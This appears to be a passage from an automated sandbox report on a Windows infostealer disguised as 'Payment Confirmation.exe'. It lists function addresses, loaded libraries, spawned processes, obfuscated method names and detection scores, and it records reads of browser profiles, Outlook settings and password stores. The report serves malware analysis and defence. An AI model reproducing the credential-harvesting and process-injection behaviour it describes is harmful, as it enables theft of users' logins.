                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8EEDB10_2_03D8EEDB
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8CE9310_2_03D8CE93
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CE2E9010_2_03CE2E90
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD0E5910_2_03CD0E59
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8EE2610_2_03D8EE26
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CCADE010_2_03CCADE0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CE8DBF10_2_03CE8DBF
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6CD1F10_2_03D6CD1F
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDAD0010_2_03CDAD00
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC0CF210_2_03CC0CF2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D70CB510_2_03D70CB5
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD0C0010_2_03CD0C00
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D1739A10_2_03D1739A
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CBD34C10_2_03CBD34C
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8132D10_2_03D8132D
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEB2C010_2_03CEB2C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D712ED10_2_03D712ED
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD52A010_2_03CD52A0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CDB1B010_2_03CDB1B0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D9B16B10_2_03D9B16B
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CBF17210_2_03CBF172
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D0516C10_2_03D0516C
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD70C010_2_03CD70C0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7F0CC10_2_03D7F0CC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D870E910_2_03D870E9
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8F0E010_2_03D8F0E0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8F7B010_2_03D8F7B0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D816CC10_2_03D816CC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D1563010_2_03D15630
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D995C310_2_03D995C3
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6D5B010_2_03D6D5B0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8757110_2_03D87571
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC146010_2_03CC1460
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8F43F10_2_03D8F43F
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D45BF010_2_03D45BF0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D0DBF910_2_03D0DBF9
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEFB8010_2_03CEFB80
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FB7610_2_03D8FB76
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D7DAC610_2_03D7DAC6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D15AA010_2_03D15AA0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D71AA310_2_03D71AA3
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6DAAC10_2_03D6DAAC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FA4910_2_03D8FA49
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D87A4610_2_03D87A46
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D43A6C10_2_03D43A6C
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD995010_2_03CD9950
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEB95010_2_03CEB950
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D6591010_2_03D65910
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD38E010_2_03CD38E0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D3D80010_2_03D3D800
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD1F9210_2_03CD1F92
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FFB110_2_03D8FFB1
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FF0910_2_03D8FF09
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD9EB010_2_03CD9EB0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CEFDC010_2_03CEFDC0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D81D5A10_2_03D81D5A
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CD3D4010_2_03CD3D40
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D87D7310_2_03D87D73
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D8FCF210_2_03D8FCF2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03D49C3210_2_03D49C32
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331208010_2_03312080
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330CED010_2_0330CED0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330CEC710_2_0330CEC7
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330B22010_2_0330B220
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330B21510_2_0330B215
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_033011B210_2_033011B2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_033010B210_2_033010B2
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330D0F010_2_0330D0F0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0330B0D010_2_0330B0D0
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331579010_2_03315790
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331397B10_2_0331397B
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331398010_2_03313980
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0332BE8010_2_0332BE80
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6E33510_2_03B6E335
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6E7EC10_2_03B6E7EC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6E45310_2_03B6E453
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6CB5810_2_03B6CB58
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6D8B810_2_03B6D8B8
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: String function: 01A15130 appears 58 times
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: String function: 01A5F290 appears 105 times
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: String function: 01A4EA12 appears 86 times
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: String function: 01A27E54 appears 111 times
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: String function: 019CB970 appears 280 times
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: String function: 03D17E54 appears 111 times
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: String function: 03D3EA12 appears 86 times
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: String function: 03CBB970 appears 280 times
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: String function: 03D4F290 appears 105 times
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: String function: 03D05130 appears 58 times
                Source: Payment Confirmation.exe, 00000003.00000002.1288340324.000000000126E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Confirmation.exe
                Source: Payment Confirmation.exe, 00000003.00000002.1295515072.0000000008260000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Confirmation.exe
                Source: Payment Confirmation.exe, 00000003.00000000.1272154268.0000000000C44000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametrbp.exe* vs Payment Confirmation.exe
                Source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAUDITPOL.EXEj% vs Payment Confirmation.exe
                Source: Payment Confirmation.exe, 00000007.00000002.1550286836.0000000001ACD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Confirmation.exe
                Source: Payment Confirmation.exeBinary or memory string: OriginalFilenametrbp.exe* vs Payment Confirmation.exe
                Source: Payment Confirmation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment Confirmation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, kVqslxTTKp7XX8M7jb.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, kVqslxTTKp7XX8M7jb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ISCjAwD8rEKIcVdNMM.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ISCjAwD8rEKIcVdNMM.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, ISCjAwD8rEKIcVdNMM.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Confirmation.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\auditpol.exeFile created: C:\Users\user\AppData\Local\Temp\f37-37IJump to behavior
                Source: Payment Confirmation.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Payment Confirmation.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: auditpol.exe, 0000000A.00000002.3729900422.000000000357A000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3729900422.0000000003545000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1733683333.000000000357A000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1733683333.0000000003545000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment Confirmation.exeVirustotal: Detection: 30%
                Source: Payment Confirmation.exeReversingLabs: Detection: 36%
                Source: unknownProcess created: C:\Users\user\Desktop\Payment Confirmation.exe "C:\Users\user\Desktop\Payment Confirmation.exe"
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe "C:\Users\user\Desktop\Payment Confirmation.exe"
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeProcess created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"
                Source: C:\Windows\SysWOW64\auditpol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe "C:\Users\user\Desktop\Payment Confirmation.exe"Jump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeProcess created: C:\Windows\SysWOW64\auditpol.exe "C:\Windows\SysWOW64\auditpol.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: auditpolcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\mfyQbcPhqmWFzTNgTDoFAaLrLewzuEgxpaKKAwiZKgOitBelbveNWwNc\yT3kwEipvxIo4KXERrb.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Payment Confirmation.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\auditpol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Payment Confirmation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Payment Confirmation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Payment Confirmation.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: trbp.pdb source: Payment Confirmation.exe
                Source: Binary string: auditpol.pdbGCTL source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3730747872.00000000010AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment Confirmation.exe, 00000007.00000002.1550286836.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1552521292.0000000003ADD000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1549442641.0000000003926000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment Confirmation.exe, Payment Confirmation.exe, 00000007.00000002.1550286836.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, auditpol.exe, 0000000A.00000003.1552521292.0000000003ADD000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003C90000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.1549442641.0000000003926000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.3731867390.0000000003E2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: auditpol.pdb source: Payment Confirmation.exe, 00000007.00000002.1550004144.0000000001477000.00000004.00000020.00020000.00000000.sdmp, yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3730747872.00000000010AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: trbp.pdbSHA256@} source: Payment Confirmation.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yT3kwEipvxIo4KXERrb.exe, 00000009.00000002.3729563719.000000000049F000.00000002.00000001.01000000.0000000A.sdmp, yT3kwEipvxIo4KXERrb.exe, 0000000B.00000000.1619731121.000000000049F000.00000002.00000001.01000000.0000000A.sdmp
                Source: Payment Confirmation.exeStatic PE information: 0xC0F8C2D1 [Thu Aug 4 09:24:33 2072 UTC]
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_015BDA4B pushfd ; retf 3_2_015BDA81
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_015BDA82 push eax; retf 3_2_015BDA85
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_0753C603 pushad ; ret 3_2_0753C609
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 3_2_0757ED39 push 4C076FBEh; retf 3_2_0757ED45
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00424273 push esi; retf 7_2_0042427E
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_004053BC push ds; ret 7_2_004053D0
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00403480 push eax; ret 7_2_00403482
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_00418583 push edi; iretd 7_2_004185A1
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019A225F pushad ; ret 7_2_019A27F9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019A27FA pushad ; ret 7_2_019A27F9
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019D09AD push ecx; mov dword ptr [esp], ecx7_2_019D09B6
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019A283D push eax; iretd 7_2_019A2858
                Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 7_2_019A1368 push eax; iretd 7_2_019A1369
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03CC09AD push ecx; mov dword ptr [esp], ecx10_2_03CC09B6
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331A21B push ebp; ret 10_2_0331A230
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331A15F push 0000001Ah; retf 10_2_0331A14A
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331A1E5 push ebp; ret 10_2_0331A230
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331A0E0 push 0000001Ah; retf 10_2_0331A14A
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331A0D5 push 0000001Ah; retf 10_2_0331A14A
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331C743 push esp; ret 10_2_0331C74B
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03320DF0 push esi; retf 10_2_03320DFB
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03315100 push edi; iretd 10_2_0331511E
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331554D pushfd ; ret 10_2_03315555
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03323A70 push ss; retn 5CD7h10_2_03323A8F
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_0331787C push ecx; retf 10_2_0331787D
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03301F39 push ds; ret 10_2_03301F4D
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6C2A5 push FFFFFF83h; ret 10_2_03B6C2AC
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B60746 push edi; ret 10_2_03B60747
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B6B691 push cs; iretd 10_2_03B6B6D4
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B65453 push ecx; iretd 10_2_03B6546F
                Source: C:\Windows\SysWOW64\auditpol.exeCode function: 10_2_03B659FB push edx; retf 10_2_03B65A00
                Source: Payment Confirmation.exeStatic PE information: section name: .text entropy: 7.583443478976572
                Source: 3.2.Payment Confirmation.exe.76c0000.3.raw.unpack, RXv2gXFWfOHdOu5o4x.csHigh entropy of concatenated method names: 'Dispose', 'RXvF2gXWf', 'n2Bp3KX6LyhTbP96rs', 'HAstR11TVar3Xj672y', 'xsAVXGkykj1GusshJD', 'JGFM2jecZvOttkGp4k', 'HHpSMXNqrPUQ9uRakI', 'ranpYVVsY7udN56k77', 'p5pu9YMFbrUFoKYFkw', 'AbP9nkAg30G7nF7ARo'
                Source: 3.2.Payment Confirmation.exe.76c0000.3.raw.unpack, gaWNLGnov1rlIG3v4D.csHigh entropy of concatenated method names: 'RQZhEfdal', 'elpwuw9vg', 'C7SvONiOb', 'aZJEKrY9W', 'sgWQQRlj4', 'RrdjBPCmS', 'Sy8pMxXYf', 'wHiomWuqF', 'Mi7rXdWnP', 'uih5bqCV1'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, d24MfJ7JLTHOv9klLl.csHigh entropy of concatenated method names: 'O5Ykjm7Iq5', 'xitk1Vdasm', 'LVwkCryyYN', 'FlpkA6hN05', 'c3SkY1QNnU', 'ktRkPeM5J0', 'bKIkxubKLE', 'oR0kTKKXlY', 'kTakt9nmdY', 'lj9kvDw7GS'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, cxYCwFOHgRaqQ6m5if.csHigh entropy of concatenated method names: 'Dispose', 'mIrIslpo2U', 's9G35BNBv3', 'qb6cTDLos3', 'uJkIZidiON', 'rRQIzP1EAn', 'ProcessDialogKey', 'TgR3NifPhr', 'QaQ3ISJZnW', 'Pa133qyU9I'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, p4kh4Qt5SDyccaB7jc.csHigh entropy of concatenated method names: 'SpdwAfTmqQ', 'rVnwPcW63i', 'uihwTEjEcE', 'LKOwtYi9fi', 'lTAwW3dKPl', 'xh3wX57ikH', 'sauw4YuhwW', 'EZXwFwjIiF', 'svcwiXErOo', 'JtZwBwsbZS'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, STPbeOarolG1pqNaA3.csHigh entropy of concatenated method names: 'JYU490vRsb', 'lTD4ZGuxGv', 'C6XFN1OZRU', 'g4iFI9eVK1', 'oel4nsvph5', 'jbZ4LeIRhn', 'BTR4SRAqUV', 'hNC4KHULwI', 'zmf48OBlAd', 'FZa4f7cq2f'
                Source: 3.2.Payment Confirmation.exe.8260000.4.raw.unpack, MK17evKUqtic4cSLFh.csHigh entropy of concatenated method names: 'woNWc0bpBq', 'cVlWLlZSSI', 'q0MWKRqo89', 'MDaW8o4gu3', 'dVXW5BdQ9l', 'rvNW65Dr00', 'xKkW0iy97h', 'uPyWeSWGhK', 'N3YWphcBXe', 'Os5Wrw3NH2'
